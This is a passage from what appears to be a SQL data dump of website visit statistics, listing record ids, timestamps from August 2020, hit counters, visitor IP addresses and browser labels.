9.70.69','chrome'),(528773,1596458773,1,1,0,0,'66.249.70.70','chrome'),(528774,1596459140,8,8,0,0,'185.11.82.228','other'),(528775,1596459473,1,1,0,0,'66.249.70.72','chrome'),(528776,1596459991,1,1,0,0,'91.196.178.72','chrome'),(528777,1596460095,1,0,1,0,'66.249.70.69',''),(528778,1596460118,2,2,0,0,'66.249.70.70','chrome'),(528779,1596460688,1,1,0,0,'157.55.39.106','other'),(528780,1596460892,1,1,0,0,'91.196.178.157','chrome'),(528781,1596461089,8,8,0,0,'185.11.82.228','other'),(528782,1596461216,2,2,0,0,'66.249.70.69','chrome'),(528783,1596461415,2,2,0,0,'54.245.137.145','chrome'),(528784,1596461622,1,1,0,0,'66.249.70.72','chrome'),(528785,1596462054,1,1,0,0,'66.249.70.70','chrome'),(528786,1596462950,1,1,0,0,'46.150.0.112','chrome'),(528787,1596463037,8,8,0,0,'185.11.82.228','other'),(528788,1596463075,1,1,0,0,'66.249.70.70','chrome'),(528789,1596463295,1,1,0,0,'66.249.64.33','chrome'),(528790,1596464412,1,1,0,0,'66.249.64.38','chrome'),(528791,1596464514,1,1,0,0,'8.29.198.27','other'),(528792,1596464962,8,8,0,0,'185.11.82.228','other'),(528793,1596465858,1,1,0,0,'66.249.70.72','chrome'),(528794,1596466506,3,3,0,0,'66.249.70.69','chrome'),(528795,1596466958,8,8,0,0,'185.11.82.228','other'),(528796,1596467135,1,1,0,0,'207.46.13.4','other'),(528797,1596467245,1,1,0,0,'66.249.70.72','chrome'),(528798,1596468097,1,1,0,0,'66.249.70.70','chrome'),(528799,1596468903,8,8,0,0,'185.11.82.228','other'),(528800,1596469274,1,1,0,0,'159.89.161.141','other'),(528801,1596470602,6,6,0,0,'66.249.70.69','chrome'),(528802,1596470832,8,8,0,0,'185.11.82.228','other'),(528803,1596470879,3,3,0,0,'66.249.70.72','chrome'),(528804,1596470984,3,3,0,0,'66.249.70.70','chrome'),(528805,1596471621,1,1,0,0,'66.249.70.69','chrome'),(528806,1596471756,2,2,0,0,'66.249.64.33','chrome'),(528807,1596472167,1,1,0,0,'157.55.39.106','other'),(528808,1596472314,1,1,0,0,'66.249.70.72','chrome'),(528809,1596472521,1,1,0,0,'176.118.43.183','chrome'),(528810,1596472772,1,1,0,0,'157.55.39.132','other'),(528811,1596473088,1,1,0,0,'178.154.200.17','other'),(528812,1596473157,1,1,0,0,'188.163.18.149','chrome'),(528813,1596473562,3,3,0,0,'66.249.70.70','chrome'),(528814,1596473629,1,1,0,0,'66.249.64.33','chrome'),(528815,1596473678,2,2,0,0,'66.249.70.69','chrome'),(528816,1596474275,1,1,0,0,'176.118.43.183','chrome'),(528817,1596474448,1,1,0,0,'91.196.178.79','chrome'),(528818,1596474971,2,2,0,0,'66.249.70.70','chrome'),(528819,1596475024,1,1,0,0,'66.249.64.33','chrome'),(528820,1596475344,1,1,0,0,'8.29.198.27','other'),(528821,1596475537,1,1,0,0,'66.249.64.36','chrome'),(528822,1596475685,3,3,0,0,'66.249.70.69','chrome'),(528823,1596476228,4,4,0,0,'213.231.60.254','other'),(528824,1596476451,2,2,0,0,'66.249.70.70','chrome'),(528825,1596476594,1,1,0,0,'66.249.64.33','chrome'),(528826,1596476684,2,1,1,0,'66.249.70.69',''),(528827,1596477168,1,1,0,0,'46.201.113.100','chrome'),(528828,1596477225,1,1,0,0,'213.180.203.16','other'),(528829,1596477353,1,1,0,0,'157.55.39.132','other'),(528830,1596477528,1,1,0,0,'66.249.70.72','chrome'),(528831,1596477819,1,1,0,0,'17.58.99.7','other'),(528832,1596478187,1,1,0,0,'31.13.103.16','other'),(528833,1596478689,1,1,0,0,'176.118.43.183','chrome'),(528834,1596479010,1,1,0,0,'66.249.70.69','chrome'),(528835,1596479844,4,4,0,0,'66.249.70.70','chrome'),(528836,1596479883,1,1,0,0,'66.249.64.38','chrome'),(528837,1596479953,1,1,0,0,'66.249.70.72','chrome'),(528838,1596480072,1,1,0,0,'157.55.39.106','other'),(528839,1596480374,1,1,0,0,'157.55.39.132','other'),(528840,1596480429,1,1,0,0,'66.249.70.69','chrome'),(528841,1596481220,1,1,0,0,'66.249.70.70','chrome'),(528842,1596481716,1,1,0,0,'66.249.70.69','chrome'),(528843,1596483179,1,1,0,0,'66.249.64.33','chrome'),(528844,1596483229,1,1,0,0,'91.196.178.79','firefox'),(528845,1596483436,1,1,0,0,'66.249.70.70','chrome'),(528846,1596483840,1,1,0,0,'88.155.41.128','chrome'),(528847,1596483900,1,1,0,0,'66.249.70.69','chrome'),(528848,1596484034,1,1,0,0,'66.249.64.36','chrome'),(528849,1596484920,1,1,0,0,'91.196.178.46','chrome'),(528850,1596484963,2,2,0,0,'66.249.70.70','chrome'),(528851,1596485220,1,1,0,0,'66.249.70.72','chrome'),(528852,1596485378,4,4,0,0,'66.249.70.69','chrome'),(528853,1596485965,2,2,0,0,'66.249.70.70','chrome'),(528854,1596486176,1,1,0,0,'8.29.198.27','other'),(528855,1596486178,1,1,0,0,'31.173.83.154','chrome'),(528856,1596486367,1,1,0,0,'66.249.64.33','chrome'),(528857,1596486794,2,2,0,0,'66.249.70.69','chrome'),(528858,1596486939,1,1,0,0,'66.249.64.38','chrome'),(528859,1596487458,1,1,0,0,'66.249.64.33','chrome'),(528860,1596487491,2,2,0,0,'95.213.141.126','opera'),(528861,1596487526,48,48,0,0,'213.231.60.254','chrome'),(528862,1596487616,1,1,0,0,'207.46.13.4','other'),(528863,1596488001,1,1,0,0,'66.249.70.72','chrome'),(528864,1596488610,1,1,0,0,'66.249.64.33','chrome'),(528865,1596489141,1,1,0,0,'207.46.13.175','other'),(528866,1596489782,1,1,0,0,'213.180.203.95','other'),(528867,1596489783,1,1,0,0,'207.46.13.4','other'),(528868,1596490132,1,1,0,0,'157.55.39.106','other'),(528869,1596490617,37,37,0,0,'213.231.60.254','chrome'),(528870,1596491816,1,1,0,0,'207.46.13.175','other'),(528871,1596492690,1,1,0,0,'207.46.13.4','other'),(528872,1596493833,1,1,0,0,'94.153.2.34','chrome'),(528873,1596496002,1,1,0,0,'157.55.39.132','other'),(528874,1596497005,1,1,0,0,'8.29.198.26','other'),(528875,1596497174,1,1,0,0,'66.249.64.38','chrome'),(528876,1596498376,1,1,0,0,'66.249.64.36','chrome'),(528877,1596498474,1,1,0,0,'66.249.70.70','chrome'),(528878,1596498622,1,1,0,0,'157.55.39.106','other'),(528879,1596498908,1,1,0,0,'62.205.134.182','other'),(528880,1596499369,1,1,0,0,'66.249.70.69','chrome'),(528881,1596500441,1,1,0,0,'207.46.13.175','other'),(528882,1596502958,1,1,0,0,'66.249.70.70','chrome'),(528883,1596504162,1,1,0,0,'91.209.11.236','other'),(528884,1596504252,1,1,0,0,'157.55.39.132','other'),(528885,1596505608,1,1,0,0,'207.46.13.4','other'),(528886,1596506274,1,1,0,0,'66.249.64.33','chrome'),(528887,1596506510,1,1,0,0,'66.249.70.69','chrome'),(528888,1596506720,1,1,0,0,'207.46.13.4','other'),(528889,1596506963,1,1,0,0,'66.249.70.72','chrome'),(528890,1596507143,2,2,0,0,'157.55.39.132','other'),(528891,1596507458,1,1,0,0,'66.249.70.69','chrome'),(528892,1596507834,1,1,0,0,'8.29.198.26','other'),(528893,1596509857,1,1,0,0,'207.46.13.175','other'),(528894,1596510019,3,3,0,0,'66.249.70.70','chrome'),(528895,1596510071,3,3,0,0,'66.249.70.69','chrome'),(528896,1596512598,1,1,0,0,'207.46.13.4','other'),(528897,1596513579,1,1,0,0,'66.249.70.72','chrome'),(528898,1596513807,1,1,0,0,'185.191.204.3','chrome'),(528899,1596515083,1,1,0,0,'207.46.13.81','other'),(528900,1596515506,1,1,0,0,'66.249.70.69','chrome'),(528901,1596516290,1,1,0,0,'66.249.70.70','chrome'),(528902,1596517000,1,1,0,0,'131.220.6.152','chrome'),(528903,1596517111,1,1,0,0,'62.205.134.182','other'),(528904,1596518671,1,1,0,0,'8.29.198.26','other'),(528905,1596519039,1,1,0,0,'207.46.13.175','other'),(528906,1596519195,2,2,0,0,'213.180.203.16','other'),(528907,1596520147,2,2,0,0,'31.13.127.7','other'),(528908,1596520557,1,1,0,0,'5.44.169.215','chrome'),(528909,1596522195,1,1,0,0,'66.249.70.69','chrome'),(528910,1596522261,2,2,0,0,'91.209.11.236','other'),(528911,1596522336,1,1,0,0,'157.55.39.132','other'),(528912,1596523867,1,0,1,0,'66.249.70.70',''),(528913,1596525401,1,1,0,0,'66.249.70.69','chrome'),(528914,1596525453,1,1,0,0,'95.27.175.137','chrome'),(528915,1596528365,3,3,0,0,'104.154.221.5','chrome'),(528916,1596528366,1,1,0,0,'104.154.221.5','other'),(528917,1596529477,3,3,0,0,'37.53.89.92','chrome'),(528918,1596529499,1,1,0,0,'8.29.198.27','other'),(528919,1596529692,1,1,0,0,'91.196.178.171','chrome'),(528920,1596529703,1,1,0,0,'66.249.64.33','chrome'),(528921,1596532065,1,1,0,0,'66.249.70.72','chrome'),(528922,1596532712,1,1,0,0,'157.55.39.132','other'),(528923,1596532944,1,1,0,0,'207.46.13.175','other'),(528924,1596533092,1,1,0,0,'66.249.70.69','chrome'),(528925,1596533157,1,1,0,0,'66.249.64.38','chrome'),(528926,1596533171,1,1,0,0,'207.46.13.4','other'),(528927,1596534277,1,1,0,0,'66.249.70.69','chrome'),(528928,1596534387,1,1,0,0,'207.46.13.175','other'),(528929,1596535133,1,1,0,0,'212.1.108.150','chrome'),(528930,1596535267,12,12,0,0,'31.206.243.10','chrome'),(528931,1596535471,1,1,0,0,'3.237.8.85','chrome'),(528932,1596536778,1,1,0,0,'91.196.178.41','chrome'),(528933,1596536978,1,1,0,0,'66.249.70.72','chrome'),(528934,1596537348,1,1,0,0,'77.111.244.5','chrome'),(528935,1596537706,2,2,0,0,'92.113.157.72','chrome'),(528936,1596537819,1,1,0,0,'207.46.13.175','other'),(528937,1596537860,1,1,0,0,'91.196.178.79','chrome'),(528938,1596537885,1,1,0,0,'46.211.51.80','chrome'),(528939,1596537984,1,1,0,0,'157.55.39.106','other'),(528940,1596538415,1,1,0,0,'207.46.13.4','other'),(528941,1596538678,1,1,0,0,'109.74.154.72','chrome'),(528942,1596538805,1,1,0,0,'94.130.9.183','other'),(528943,1596538997,1,1,0,0,'66.249.70.70','chrome'),(528944,1596540326,1,1,0,0,'8.29.198.26','other'),(528945,1596540697,1,1,0,0,'207.46.13.175','other'),(528946,1596541854,1,1,0,0,'66.249.70.70','chrome'),(528947,1596542919,1,0,1,0,'66.249.70.72',''),(528948,1596543275,1,1,0,0,'131.220.6.156','chrome'),(528949,1596543943,1,1,0,0,'176.227.245.34','chrome'),(528950,1596544412,1,1,0,0,'91.196.177.228','chrome'),(528951,1596544589,1,1,0,0,'207.46.13.175','other'),(528952,1596544833,1,1,0,0,'66.249.70.72','chrome'),(528953,1596547812,1,1,0,0,'66.249.70.70','chrome'),(528954,1596548251,1,1,0,0,'46.201.113.100','chrome'),(528955,1596548424,1,1,0,0,'157.55.39.164','other'),(528956,1596548927,1,1,0,0,'66.249.70.70','chrome'),(528957,1596549149,1,1,0,0,'13.66.139.0','other'),(528958,1596549171,1,1,0,0,'178.154.200.222','other'),(528959,1596549646,2,2,0,0,'94.153.34.235','chrome'),(528960,1596550250,1,1,0,0,'66.249.70.70','chrome'),(528961,1596550855,1,1,0,0,'207.46.13.4','other'),(528962,1596551158,1,1,0,0,'8.29.198.27','other'),(528963,1596551287,1,1,0,0,'207.46.13.175','other'),(528964,1596551723,1,1,0,0,'45.152.183.196','msie'),(528965,1596552100,1,1,0,0,'66.249.70.72','chrome'),(528966,1596552498,1,1,0,0,'66.249.64.38','chrome'),(528967,1596552812,1,1,0,0,'157.55.39.164','other'),(528968,1596553856,1,1,0,0,'66.249.70.70','chrome'),(528969,1596554226,1,1,0,0,'207.46.13.4','other'),(528970,1596554322,1,1,0,0,'157.55.39.106','other'),(528971,1596554882,1,1,0,0,'207.46.13.175','other'),(528972,1596554967,1,1,0,0,'88.99.2.203','other'),(528973,1596554968,7,7,0,0,'136.243.70.68','other'),(528974,1596556051,1,1,0,0,'66.249.70.69','chrome'),(528975,1596556347,1,1,0,0,'66.249.70.72','chrome'),(528976,1596556744,1,1,0,0,'207.46.13.175','other'),(528977,1596557650,1,1,0,0,'46.211.78.163','chrome'),(528978,1596558919,1,1,0,0,'157.55.39.106','other'),(528979,1596561320,1,1,0,0,'157.55.39.106','other'),(528980,1596561331,1,1,0,0,'38.111.214.15','chrome'),(528981,1596561521,1,1,0,0,'66.249.64.25','chrome'),(528982,1596561986,1,1,0,0,'8.29.198.27','other'),(528983,1596563785,1,1,0,0,'66.249.64.23','chrome'),(528984,1596565544,1,1,0,0,'178.154.200.222','other'),(528985,1596565545,1,1,0,0,'207.46.13.183','other'),(528986,1596566248,1,1,0,0,'207.46.13.231','other'),(528987,1596567216,1,1,0,0,'66.249.64.23','chrome'),(528988,1596567869,1,1,0,0,'17.58.99.84','other'),(528989,1596568612,1,0,1,0,'66.249.64.25',''),(528990,1596569986,1,1,0,0,'66.249.64.25','chrome'),(528991,1596570178,1,1,0,0,'66.249.64.23','chrome'),(528992,1596571089,1,1,0,0,'66.249.64.25','chrome'),(528993,1596571719,1,1,0,0,'88.155.141.238','chrome'),(528994,1596572164,1,1,0,0,'66.249.64.23','chrome'),(528995,1596572210,1,1,0,0,'91.196.178.61','chrome'),(528996,1596572816,1,1,0,0,'8.29.198.26','other'),(528997,1596572976,1,1,0,0,'17.58.99.84','other'),(528998,1596577497,1,1,0,0,'66.249.64.25','chrome'),(528999,1596578453,2,2,0,0,'157.55.39.224','other'),(529000,1596579448,1,0,1,0,'66.249.64.23',''),(529001,1596583641,1,1,0,0,'8.29.198.26','other'),(529002,1596583782,1,1,0,0,'209.17.96.90','other'),(529003,1596584469,1,1,0,0,'66.249.64.25','chrome'),(529004,1596585308,1,1,0,0,'62.205.134.182','other'),(529005,1596585309,1,1,0,0,'17.58.99.84','other'),(529006,1596587601,1,1,0,0,'66.249.64.25','chrome'),(529007,1596589213,4,4,0,0,'66.249.64.25','chrome'),(529008,1596590337,1,1,0,0,'213.180.203.16','other'),(529009,1596590465,1,1,0,0,'178.154.200.222','other'),(529010,1596591349,1,1,0,0,'66.249.64.23','chrome'),(529011,1596592645,1,1,0,0,'51.158.109.172','chrome'),(529012,1596592787,1,1,0,0,'66.249.64.24','chrome'),(529013,1596594469,1,1,0,0,'8.29.198.25','other'),(529014,1596595653,1,1,0,0,'178.154.200.222','other'),(529015,1596596011,1,0,1,0,'66.249.64.23',''),(529016,1596596842,1,1,0,0,'17.58.99.84','other'),(529017,1596597766,1,1,0,0,'213.180.203.16','other'),(529018,1596598084,1,1,0,0,'66.249.64.23','chrome'),(529019,1596598445,1,1,0,0,'178.154.200.222','other'),(529020,1596600153,1,1,0,0,'66.249.64.25','chrome'),(529021,1596600205,1,1,0,0,'66.249.70.65','chrome'),(529022,1596600826,1,1,0,0,'185.119.66.5','chrome'),(529023,1596600848,1,1,0,0,'46.187.31.62','chrome'),(529024,1596601617,1,1,0,0,'17.58.99.84','other'),(529025,1596602333,1,1,0,0,'66.249.64.24','chrome'),(529026,1596603066,1,1,0,0,'131.220.6.152','chrome'),(529027,1596603192,1,1,0,0,'157.55.39.9','other'),(529028,1596603482,1,1,0,0,'62.205.134.182','other'),(529029,1596605297,1,1,0,0,'8.29.198.25','other'),(529030,1596606491,1,1,0,0,'195.206.107.118','msie'),(529031,1596606744,1,1,0,0,'176.111.33.18','firefox'),(529032,1596607382,1,1,0,0,'66.249.69.197','chrome'),(529033,1596607988,1,1,0,0,'178.154.200.112','other'),(529034,1596608350,1,1,0,0,'178.94.115.167','chrome'),(529035,1596608636,1,1,0,0,'66.249.69.197','chrome'),(529036,1596609010,1,1,0,0,'91.196.178.79','chrome'),(529037,1596611419,1,1,0,0,'185.8.41.69','other'),(529038,1596612174,1,1,0,0,'66.249.69.197','chrome'),(529039,1596613491,1,1,0,0,'66.249.69.200','chrome'),(529040,1596614003,1,1,0,0,'95.135.195.170','chrome'),(529041,1596614105,1,1,0,0,'37.120.197.51','msie'),(529042,1596614783,3,3,0,0,'66.249.69.198','chrome'),(529043,1596615183,2,2,0,0,'91.196.177.17','chrome'),(529044,1596615740,2,2,0,0,'66.249.69.198','chrome'),(529045,1596616036,1,1,0,0,'66.249.69.200','chrome'),(529046,1596616129,1,1,0,0,'8.29.198.26','other'),(529047,1596618258,1,1,0,0,'37.120.197.51','msie'),(529048,1596618706,1,1,0,0,'192.71.126.175','other'),(529049,1596618966,1,1,0,0,'91.196.178.84','chrome'),(529050,1596619883,1,1,0,0,'91.196.178.84','chrome'),(529051,1596620530,1,1,0,0,'66.249.72.4','chrome'),(529052,1596620721,1,1,0,0,'66.249.72.2','chrome'),(529053,1596620961,1,1,0,0,'178.154.200.196','other'),(529054,1596621161,8,8,0,0,'193.194.115.242','other'),(529055,1596621784,2,2,0,0,'66.249.72.6','chrome'),(529056,1596622411,1,1,0,0,'66.249.69.200','chrome'),(529057,1596622746,1,1,0,0,'3.22.95.178','chrome'),(529058,1596623107,7,7,0,0,'193.194.115.242','other'),(529059,1596623230,1,1,0,0,'66.249.69.198','chrome'),(529060,1596624519,1,1,0,0,'66.249.69.198','chrome'),(529061,1596625148,1,1,0,0,'109.74.154.72','chrome'),(529062,1596625299,8,8,0,0,'193.194.115.242','other'),(529063,1596625304,1,1,0,0,'66.249.69.200','chrome'),(529064,1596625472,1,1,0,0,'157.55.39.9','other'),(529065,1596625617,1,1,0,0,'213.108.45.138','firefox'),(529066,1596626006,1,1,0,0,'77.111.244.34','chrome'),(529067,1596626198,2,2,0,0,'95.213.141.126','opera'),(529068,1596626258,2,2,0,0,'37.73.22.220','chrome'),(529069,1596626577,1,0,1,0,'66.249.69.198',''),(529070,1596626626,1,1,0,0,'66.249.69.198','chrome'),(529071,1596626809,1,1,0,0,'66.249.69.197','chrome'),(529072,1596626964,1,1,0,0,'8.29.198.26','other'),(529073,1596627159,8,8,0,0,'193.194.115.242','other'),(529074,1596627266,1,1,0,0,'17.58.99.7','other'),(529075,1596627672,1,1,0,0,'66.249.69.198','chrome'),(529076,1596627983,1,1,0,0,'131.220.6.156','chrome'),(529077,1596628647,1,1,0,0,'17.58.99.7','other'),(529078,1596629546,8,8,0,0,'193.194.115.242','other'),(529079,1596629661,1,1,0,0,'91.196.178.153','chrome'),(529080,1596630870,1,1,0,0,'69.171.251.14','other'),(529081,1596630982,1,1,0,0,'66.249.72.6','chrome'),(529082,1596631099,1,0,1,0,'149.28.63.32',''),(529083,1596631373,1,1,0,0,'194.1.195.225','chrome'),(529084,1596631397,1,1,0,0,'91.196.178.72','chrome'),(529085,1596631624,4,4,0,0,'94.130.9.183','other'),(529086,1596631765,1,1,0,0,'66.249.69.198','chrome'),(529087,1596632140,8,8,0,0,'193.194.115.242','other'),(529088,1596633963,1,1,0,0,'178.95.156.86','chrome'),(529089,1596634278,1,1,0,0,'91.196.178.72','chrome'),(529090,1596634763,8,8,0,0,'193.194.115.242','other'),(529091,1596635200,1,1,0,0,'178.54.195.39','chrome'),(529092,1596637795,1,1,0,0,'8.29.198.25','other'),(529093,1596637824,1,1,0,0,'193.34.172.232','msie'),(529094,1596637880,1,1,0,0,'66.249.69.198','chrome'),(529095,1596637881,1,1,0,0,'46.201.135.81','chrome'),(529096,1596638076,1,1,0,0,'17.58.99.84','other'),(529097,1596638321,8,8,0,0,'193.194.115.242','other'),(529098,1596638386,2,2,0,0,'91.209.11.236','other'),(529099,1596639039,1,1,0,0,'17.58.99.84','other'),(529100,1596639622,1,1,0,0,'91.209.11.236','other'),(529101,1596640733,1,1,0,0,'5.255.253.151','other'),(529102,1596641655,1,1,0,0,'157.55.39.247','other'),(529103,1596645510,2,2,0,0,'66.249.69.200','chrome'),(529104,1596646489,1,1,0,0,'17.58.99.7','other'),(529105,1596646626,1,1,0,0,'66.249.69.197','chrome'),(529106,1596647687,1,1,0,0,'66.249.69.198','chrome'),(529107,1596648631,1,1,0,0,'8.29.198.26','other'),(529108,1596649520,1,1,0,0,'157.55.39.247','other'),(529109,1596650980,1,1,0,0,'46.211.13.172','chrome'),(529110,1596651262,7,7,0,0,'193.194.115.242','other'),(529111,1596651345,1,1,0,0,'66.249.69.198','chrome'),(529112,1596653622,1,1,0,0,'209.17.96.114','other'),(529113,1596654141,8,8,0,0,'193.194.115.242','other'),(529114,1596654726,1,1,0,0,'66.249.69.198','chrome'),(529115,1596655356,1,1,0,0,'88.99.2.203','other'),(529116,1596655358,7,7,0,0,'136.243.70.68','other'),(529117,1596656326,1,1,0,0,'173.252.95.9','other'),(529118,1596657075,8,8,0,0,'193.194.115.242','other'),(529119,1596657475,1,1,0,0,'88.155.53.204','chrome'),(529120,1596658276,1,1,0,0,'66.249.69.197','chrome'),(529121,1596658327,1,1,0,0,'157.55.39.166','other'),(529122,1596658537,1,1,0,0,'157.55.39.145','other'),(529123,1596659317,1,1,0,0,'157.55.39.166','other'),(529124,1596659461,1,1,0,0,'8.29.198.25','other'),(529125,1596659532,1,1,0,0,'66.249.72.2','chrome'),(529126,1596659779,8,8,0,0,'193.194.115.242','other'),(529127,1596659804,1,1,0,0,'157.55.39.51','other'),(529128,1596660346,1,1,0,0,'157.55.39.164','other'),(529129,1596660422,1,1,0,0,'66.249.69.198','chrome'),(529130,1596662575,2,2,0,0,'207.46.13.51','other'),(529131,1596662684,2,2,0,0,'157.55.39.170','other'),(529132,1596662693,1,1,0,0,'17.58.99.84','other'),(529133,1596662804,8,8,0,0,'193.194.115.242','other'),(529134,1596665585,2,1,1,0,'66.249.70.70',''),(529135,1596665695,1,1,0,0,'157.55.39.167','other'),(529136,1596665715,8,8,0,0,'193.194.115.242','other'),(529137,1596666572,1,1,0,0,'66.249.70.72','chrome'),(529138,1596666773,1,1,0,0,'157.55.39.162','other'),(529139,1596667202,1,1,0,0,'157.55.39.132','other'),(529140,1596667662,1,1,0,0,'66.249.70.72','chrome'),(529141,1596669333,8,8,0,0,'193.194.115.242','other'),(529142,1596669384,1,1,0,0,'66.249.70.72','chrome'),(529143,1596669878,1,1,0,0,'66.249.70.70','chrome'),(529144,1596670298,1,1,0,0,'8.29.198.26','other'),(529145,1596671603,1,1,0,0,'157.55.39.168','other'),(529146,1596671709,1,1,0,0,'62.205.134.182','other'),(529147,1596672288,8,8,0,0,'193.194.115.242','other'),(529148,1596672419,2,2,0,0,'66.249.70.72','chrome'),(529149,1596675546,8,8,0,0,'193.194.115.242','other'),(529150,1596675912,1,1,0,0,'66.249.70.69','chrome'),(529151,1596676047,1,1,0,0,'5.255.253.69','other'),(529152,1596676376,1,1,0,0,'207.46.13.51','other'),(529153,1596677480,1,1,0,0,'157.55.39.244','other'),(529154,1596678819,1,1,0,0,'193.106.30.99','firefox'),(529155,1596678826,1,1,0,0,'157.55.39.169','other'),(529156,1596679031,1,1,0,0,'157.55.39.161','other'),(529157,1596679178,2,2,0,0,'157.55.39.168','other'),(529158,1596680464,8,8,0,0,'193.194.115.242','other'),(529159,1596680611,1,1,0,0,'66.249.70.70','chrome'),(529160,1596681132,1,1,0,0,'8.29.198.25','other'),(529161,1596682604,1,1,0,0,'17.58.99.7','other'),(529162,1596683297,1,1,0,0,'66.249.70.72','chrome'),(529163,1596684743,1,1,0,0,'157.55.39.161','other'),(529164,1596685286,1,1,0,0,'207.46.13.200','other'),(529165,1596685859,1,1,0,0,'17.58.99.84','other'),(529166,1596686423,7,7,0,0,'193.194.115.242','other'),(529167,1596686741,1,1,0,0,'66.249.70.69','chrome'),(529168,1596687491,12,12,0,0,'31.206.243.10','chrome'),(529169,1596687554,2,2,0,0,'66.249.70.72','chrome'),(529170,1596688094,2,2,0,0,'66.249.70.69','chrome'),(529171,1596688388,1,1,0,0,'157.55.39.161','other'),(529172,1596688709,1,1,0,0,'131.220.6.152','chrome'),(529173,1596689785,1,1,0,0,'62.205.134.182','other'),(529174,1596691287,1,1,0,0,'5.45.207.174','other'),(529175,1596691572,1,1,0,0,'17.58.99.7','other'),(529176,1596691621,1,1,0,0,'193.194.115.242','other'),(529177,1596691679,1,1,0,0,'66.249.70.70','chrome'),(529178,1596691957,1,1,0,0,'8.29.198.26','other'),(529179,1596692337,1,1,0,0,'66.249.64.38','chrome'),(529180,1596692526,1,1,0,0,'66.249.64.36','chrome'),(529181,1596692926,1,1,0,0,'91.196.178.72','chrome'),(529182,1596693367,1,1,0,0,'66.249.70.69','chrome'),(529183,1596693666,1,1,0,0,'94.153.30.29','chrome'),(529184,1596694482,1,1,0,0,'66.249.70.72','chrome'),(529185,1596695788,1,1,0,0,'66.249.70.70','chrome'),(529186,1596696537,1,1,0,0,'5.45.207.174','other'),(529187,1596696555,1,1,0,0,'178.154.200.98','other'),(529188,1596696969,3,3,0,0,'66.249.70.69','chrome'),(529189,1596698042,1,1,0,0,'176.111.33.18','firefox'),(529190,1596699306,1,1,0,0,'66.249.70.72','chrome'),(529191,1596699498,2,2,0,0,'66.249.70.70','chrome'),(529192,1596699598,1,1,0,0,'31.13.127.120','other'),(529193,1596699752,1,1,0,0,'157.55.39.168','other'),(529194,1596700158,2,2,0,0,'91.196.178.72','chrome'),(529195,1596700384,1,1,0,0,'91.196.177.46','chrome'),(529196,1596700416,1,1,0,0,'51.15.210.250','chrome'),(529197,1596701672,1,1,0,0,'91.196.177.46','chrome'),(529198,1596701837,1,1,0,0,'178.154.200.51','other'),(529199,1596702292,3,3,0,0,'66.249.70.72','chrome'),(529200,1596702300,1,1,0,0,'66.249.70.70','chrome'),(529201,1596702687,3,3,0,0,'157.55.39.168','other'),(529202,1596702796,1,1,0,0,'8.29.198.25','other'),(529203,1596703626,1,1,0,0,'66.249.70.72','chrome'),(529204,1596703635,1,1,0,0,'195.140.170.2','chrome'),(529205,1596703637,1,1,0,0,'157.55.39.244','other'),(529206,1596703832,1,1,0,0,'66.249.64.38','chrome'),(529207,1596704021,1,1,0,0,'157.55.39.168','other'),(529208,1596704360,1,1,0,0,'91.196.178.79','chrome'),(529209,1596704546,2,2,0,0,'66.249.70.70','chrome'),(529210,1596704962,2,2,0,0,'66.249.70.72','chrome'),(529211,1596705819,1,1,0,0,'91.196.177.147','chrome'),(529212,1596706602,1,0,1,0,'66.249.64.38',''),(529213,1596707002,1,1,0,0,'46.201.113.100','chrome'),(529214,1596707468,1,1,0,0,'66.249.70.72','chrome'),(529215,1596707829,1,1,0,0,'18.222.140.65','chrome'),(529216,1596708598,1,1,0,0,'91.196.177.46','chrome'),(529217,1596709152,2,2,0,0,'195.154.242.189','chrome'),(529218,1596709306,1,1,0,0,'66.249.70.69','chrome'),(529219,1596710015,1,1,0,0,'157.55.39.168','other'),(529220,1596710231,1,1,0,0,'176.111.33.18','firefox'),(529221,1596710394,1,1,0,0,'77.111.244.26','chrome'),(529222,1596710499,1,1,0,0,'207.46.13.200','other'),(529223,1596710903,1,1,0,0,'54.187.119.140','chrome'),(529224,1596711162,1,1,0,0,'66.249.70.69','chrome'),(529225,1596711660,1,1,0,0,'66.249.70.72','chrome'),(529226,1596711748,3,3,0,0,'46.219.85.64','chrome'),(529227,1596711810,2,2,0,0,'66.249.64.38','chrome'),(529228,1596711872,1,1,0,0,'109.74.154.72','chrome'),(529229,1596712039,1,1,0,0,'207.46.13.85','other'),(529230,1596712727,1,1,0,0,'66.249.70.69','chrome'),(529231,1596713089,1,1,0,0,'91.196.178.121','chrome'),(529232,1596713127,1,1,0,0,'157.55.39.244','other'),(529233,1596713478,1,1,0,0,'207.46.13.200','other'),(529234,1596713498,2,2,0,0,'157.55.39.161','other'),(529235,1596713633,1,1,0,0,'8.29.198.25','other'),(529236,1596713652,1,1,0,0,'66.249.64.38','chrome'),(529237,1596713706,1,1,0,0,'66.249.70.72','chrome'),(529238,1596713998,1,1,0,0,'91.196.178.73','chrome'),(529239,1596714126,1,1,0,0,'91.196.178.53','chrome'),(529240,1596714451,1,1,0,0,'157.55.39.244','other'),(529241,1596715188,1,1,0,0,'91.196.178.72','chrome'),(529242,1596717157,7,7,0,0,'193.194.115.242','other'),(529243,1596717300,1,1,0,0,'157.55.39.168','other'),(529244,1596717306,1,1,0,0,'207.46.13.85','other'),(529245,1596718023,1,1,0,0,'157.55.39.161','other'),(529246,1596718147,2,2,0,0,'66.249.70.72','chrome'),(529247,1596718464,1,1,0,0,'66.249.70.69','chrome'),(529248,1596718634,1,1,0,0,'91.196.178.72','chrome'),(529249,1596720543,1,1,0,0,'66.249.70.70','chrome'),(529250,1596720918,8,8,0,0,'193.194.115.242','other'),(529251,1596722500,1,1,0,0,'178.154.200.105','other'),(529252,1596723221,1,1,0,0,'51.77.52.160','chrome'),(529253,1596723712,1,1,0,0,'66.249.64.36','chrome'),(529254,1596724195,2,2,0,0,'66.249.70.69','chrome'),(529255,1596724353,2,2,0,0,'5.45.207.174','other'),(529256,1596724385,2,2,0,0,'66.249.70.70','chrome'),(529257,1596724459,1,1,0,0,'8.29.198.27','other'),(529258,1596724910,1,1,0,0,'66.249.64.36','chrome'),(529259,1596725745,1,1,0,0,'157.55.39.161','other'),(529260,1596725783,1,1,0,0,'157.55.39.244','other'),(529261,1596725791,1,1,0,0,'66.249.70.70','chrome'),(529262,1596726632,1,1,0,0,'66.249.64.36','chrome'),(529263,1596726703,8,8,0,0,'193.194.115.242','other'),(529264,1596726748,1,1,0,0,'66.249.70.69','chrome'),(529265,1596727213,1,1,0,0,'66.249.70.70','chrome'),(529266,1596727699,8,8,0,0,'34.200.218.187','other'),(529267,1596727728,1,1,0,0,'157.55.39.161','other'),(529268,1596727774,3,3,0,0,'34.68.186.42','chrome'),(529269,1596727775,1,1,0,0,'34.68.186.42','other'),(529270,1596728345,1,1,0,0,'66.249.70.72','chrome'),(529271,1596728436,